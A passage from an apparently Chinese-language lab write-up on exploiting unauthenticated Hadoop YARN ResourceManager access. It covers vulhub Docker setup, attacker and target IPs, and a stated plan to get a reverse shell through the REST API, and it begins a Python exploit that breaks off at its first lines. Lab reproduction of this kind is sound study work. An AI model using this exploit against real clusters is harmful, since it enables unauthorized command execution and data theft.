0x01 漏洞简介以及危害
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
0x02 漏洞利用
环境复现
目标靶机:mac os
ip:192.168.2.85
攻击机:kali
ip:10.211.55.8
Hadoop相关环境利用vulhub进行复现,vulhub安装教程请自行百度
cd /vulhub/hadoop/unauthorized-yarn
docker-compose up -d
访问http://ip:8088即可看到Hadoop YARN ResourceManager WebUI页面,形成了未授权访问
反弹shell
可以利用REST API命令执行,在攻击机监听端口,获取反弹shell
#python exp:
#!/usr/bin/env python
import requests
target = 'http://192.168.2.85:8088/'
lhost = '10.211.55.8' # put your local host ip here, and listen at port 9999
url